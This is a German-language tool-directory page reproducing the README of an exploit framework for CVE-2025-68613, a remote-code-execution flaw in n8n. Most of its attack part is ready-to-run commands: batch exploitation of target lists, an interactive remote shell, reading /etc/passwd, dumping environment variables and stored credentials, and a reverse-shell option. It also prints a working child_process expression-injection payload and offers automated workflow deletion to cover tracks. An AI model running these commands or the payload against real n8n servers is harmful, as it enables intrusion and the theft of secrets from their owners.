Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
SchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
Remote-Access-Tool
Payload-Entwicklung
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Workflow-Automatisierung Remote-Code-Ausführung

Repository anzeigen
5314vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

n8n God Mode Ultimate – CVE-2025-68613 Scanner & Exploitation Framework

n8n God Mode Ultimate

Erweiterter n8n Workflow-Automatisierungs-RCE-Scanner & Exploitation-Tool

Python Version License CVE CVSS Score


🎯 Übersicht

n8n God Mode Ultimate ist ein umfassendes Sicherheitstest-Framework, das entwickelt wurde, um CVE-2025-68613 in n8n Workflow-Automatisierungsplattformen zu erkennen und zu validieren. Diese kritische Remote-Code-Ausführungsschwachstelle (RCE) betrifft n8n-Versionen durch Expression-Injection in Workflow-Ausführungskontexten.

CVE-2025-68613 Details

  • CVSS-Score: 10.0 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Privilegien: Niedrig (gültige Anmeldedaten)
  • Benutzerinteraktion: Keine
  • Schwachstellentyp: Expression Injection → Remote-Code-Ausführung

Betroffene Versionen:

  • n8n >= 0.211.0 und < 1.120.4
  • n8n >= 1.121.0 und < 1.121.1

Gepatchte Versionen:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funktionen

🔍 Erkennung & Scanning

  • Intelligente Versionserkennung - Extrahiere n8n-Version aus den Metadaten der Anmeldeseite
  • Batch-Scanning - Multithreaded gleichzeitiges Scannen von Zielen mit Fortschrittsverfolgung
  • Mehrere Scan-Modi:
    • --detect - Nur Versionserkennung (schnellste, nicht intrusiv)
    • --safe - Sicherer Schwachstellencheck ohne Ausnutzung
    • --poc - RCE Proof-of-Concept-Validierung
    • --exploit - Vollständiger Exploitation-Modus

💣 Exploitationsfähigkeiten

  • 4 Exploitation-Techniken:
    1. Schedule-Trigger - Automatisch ausführender Workflow (zuverlässigste)
    2. Webhook-Trigger - HTTP-getriggerte Ausführung
    3. Code-Node - Direkter child_process-Zugriff
    4. Expression Injection - Manuelle Expressionsausführung

🎮 God-Mode-Funktionen

  • Interaktive Shell - Vollständige Remote-Shell mit Befehlsverlauf
  • Dateioperationen:
    • read <datei> - Remote-Dateien lesen
    • write <datei> <inhalt> - Dateien auf das Ziel schreiben
  • Umgebungsextraktion - Alle Umgebungsvariablen auslesen
  • Systeminformationen - Betriebssystemdetails, Netzwerkkonfiguration, Prozessinfo
  • Reverse Shell - Optionale Reverse-Shell-Payload-Generierung
  • Befehlsverlauf - Integrierte Verlaufsverfolgung

📊 Erweiterte Fähigkeiten

  • Credential Enumeration - Gespeicherte Anmeldedaten über API extrahieren
  • Workflow-Dumping - Alle Workflows mit Metadaten exportieren
  • Konfigurationsextraktion - Vollständigen Systemkonfigurationsdump
  • Benutzerenumeration - Alle n8n-Benutzer auflisten
  • Ausführungsprotokollanalyse - Befehlsausgaben aus Workflow-Ausführungen parsen
  • Automatisierte Bereinigung - Optionales Löschen von Workflows nach der Ausführung

🚀 Installation

Voraussetzungen

# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Abhängigkeiten installieren

# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Anforderungen

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Verwendung

Grundlegende Verwendung

# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

God-Mode-Operationen

# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Batch-Scanning

# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt Format:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Interaktive Shell-Befehle

Sobald Sie sich im Shell-Modus (--shell) befinden:

n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Befehlszeilenoptionen

Zieloptionen

-u, --url URL             Ziel-n8n-URL
-l, --list FILE           Datei mit Ziel-URLs
-t, --threads NUM         Anzahl der Threads für Batch-Scanning (Standard: 10)

Authentifizierung

-e, --email EMAIL         n8n-Benutzer-E-Mail
-p, --password PASS       n8n-Benutzer-Passwort

Scan-Modi

--detect                  Nur Versionserkennung (schnellste)
--safe                    Sicherer Check ohne Ausnutzung
--poc                     RCE Proof-of-Concept
--exploit                 Vollständiger Exploitation-Modus

God-Mode

--god                     God-Mode aktivieren
--cmd COMMAND             Einzelnen Befehl ausführen
--read-file PATH          Remote-Datei lesen
--write-file PATH         Remote-Datei schreiben
--content DATA            Inhalt für Schreiboperation
--dump-env                Alle Umgebungsvariablen extrahieren
--shell                   Interaktiver Shell-Modus
--revshell HOST:PORT      Reverse-Shell-Payload

Exploitationsoptionen

--mode MODE               Exploit-Modus: schedule|webhook|code|expression (Standard: schedule)
--timeout SEC             Befehls-Timeout in Sekunden (Standard: 30)
--cleanup                 Workflows nach Ausführung löschen
-k, --insecure           SSL-Verifikation deaktivieren
-v, --verbose            Ausführliche Ausgabe
-q, --quiet              Minimale Ausgabe

🔬 Technische Details

Exploitationsmethodik

1. Schedule-Trigger (Empfohlen)

Erstellt einen Workflow mit einem geplanten Trigger, der alle 3 Sekunden automatisch ausgeführt wird. Zuverlässigste Methode.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Webhook-Trigger

Erstellt einen HTTP-Webhook-Endpunkt, der bei Auslösung Befehle ausführt.

3. Code-Node

Injiziert Code direkt in einen Code-Node mit child_process-Zugriff.

4. Expression Injection

Manuelle Ausführung über das Expressionsauswertungssystem von n8n.

Versionserkennung

Tool herunterladen